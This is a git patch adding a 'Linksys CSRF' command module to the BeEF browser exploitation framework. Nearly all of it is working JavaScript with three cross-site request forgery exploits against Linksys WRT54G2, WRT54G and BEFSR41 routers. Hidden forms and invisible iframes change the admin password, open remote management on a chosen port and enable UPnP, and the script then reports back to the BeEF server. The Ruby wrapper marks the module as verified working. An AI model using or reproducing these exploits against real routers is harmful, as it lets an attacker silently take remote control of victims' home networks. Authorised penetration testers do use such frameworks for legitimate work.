From d088fe6fb7c8c76527ed1719ea1aab5d65fd3360 Mon Sep 17 00:00:00 2001 From: "wade@bindshell.net" Date: Mon, 20 Dec 2010 06:24:48 +0000 Subject: [PATCH] Linksys CSRF module summited by Martin Barbella committed. It contains 3 CSRF exploits. git-svn-id: https://beef.googlecode.com/svn/trunk@622 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- .../network/linksys_csrf/linksys_csrf.js | 193 ++++++++++++++++++ .../network/linksys_csrf/linksys_csrf.rb | 38 ++++ 2 files changed, 231 insertions(+) create mode 100644 modules/commands/network/linksys_csrf/linksys_csrf.js create mode 100644 modules/commands/network/linksys_csrf/linksys_csrf.rb diff --git a/modules/commands/network/linksys_csrf/linksys_csrf.js b/modules/commands/network/linksys_csrf/linksys_csrf.js new file mode 100644 index 000000000..78739e297 --- /dev/null +++ b/modules/commands/network/linksys_csrf/linksys_csrf.js @@ -0,0 +1,193 @@ +function pwn_wrt54g2() { + var port = '<%= @port %>'; + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var target = gateway + "Manage.tri"; + + var iframe = beef.dom.createInvisibleIframe(); + + var form = document.createElement('form'); + form.setAttribute('action', target); + form.setAttribute('method', 'post'); + + var input = null; + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_USE_HTTP'); + input.setAttribute('value', 0); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_HTTP'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_HTTP_S'); + input.setAttribute('value', 0); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_PASSWORDMOD'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_PASSWORD'); + input.setAttribute('value', passwd); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM'); + input.setAttribute('value', passwd); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', '_http_enable'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_WLFILTER'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_REMOTE'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_PORT'); + input.setAttribute('value', port); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'MANAGE_UPNP'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'layout'); + input.setAttribute('value', 'en'); + form.appendChild(input); + + iframe.contentWindow.document.body.appendChild(form); + form.submit(); +} + +function pwn_wrt54g() { + var port = '<%= @port %>'; + var gateway = '<%= @base %>'; + var passwd = '<%= @password %>'; + + var target = gateway + "manage.tri"; + + var iframe = beef.dom.createInvisibleIframe(); + + var form = document.createElement('form'); + form.setAttribute('action', target); + form.setAttribute('method', 'post'); + + var input = null; + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'remote_mgt_https'); + input.setAttribute('value', 0); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'http_enable'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'https_enable'); + input.setAttribute('value', 0); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'PasswdModify'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'http_passwd'); + input.setAttribute('value', passwd); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'http_passwdConfirm'); + input.setAttribute('value', passwd); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', '_http_enable'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'web_wl_filter'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'remote_management'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'http_wanport'); + input.setAttribute('value', port); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'upnp_enable'); + input.setAttribute('value', 1); + form.appendChild(input); + + input = document.createElement('input'); + input.setAttribute('type', 'hidden'); + input.setAttribute('name', 'layout'); + input.setAttribute('value', 'en'); + form.appendChild(input); + + iframe.contentWindow.document.body.appendChild(form); + form.submit(); +} + +function pwn_befsr41() { + var iframe = beef.dom.createInvisibleIframe(); + iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); +} + +beef.execute(function() { + pwn_wrt54g2(); + pwn_wrt54g(); + pwn_befsr41(); + beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); +}); diff --git a/modules/commands/network/linksys_csrf/linksys_csrf.rb b/modules/commands/network/linksys_csrf/linksys_csrf.rb new file mode 100644 index 000000000..bf11a17ac --- /dev/null +++ b/modules/commands/network/linksys_csrf/linksys_csrf.rb @@ -0,0 +1,38 @@ +module BeEF +module Modules +module Commands + + +class Linksys_csrf < BeEF::Command + + # + # Defines and set up the command module. + # + def initialize + super({ + 'Name' => 'Linksys CSRF Exploit', + 'Description' => 'Attempts to enable remote administration and change the password on a linksys router.', + 'Category' => 'Network', + 'Author' => 'Martin Barbella', + 'Data' => [['name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'], ['name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'], ['name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__']], + 'File' => __FILE__ + }) + + set_target({ + 'verified_status' => VERIFIED_WORKING, + 'browser_name' => ALL + }) + + use_template! + end + + + def callback + save({'result' => @datastore['result']}) + end + +end + +end +end +end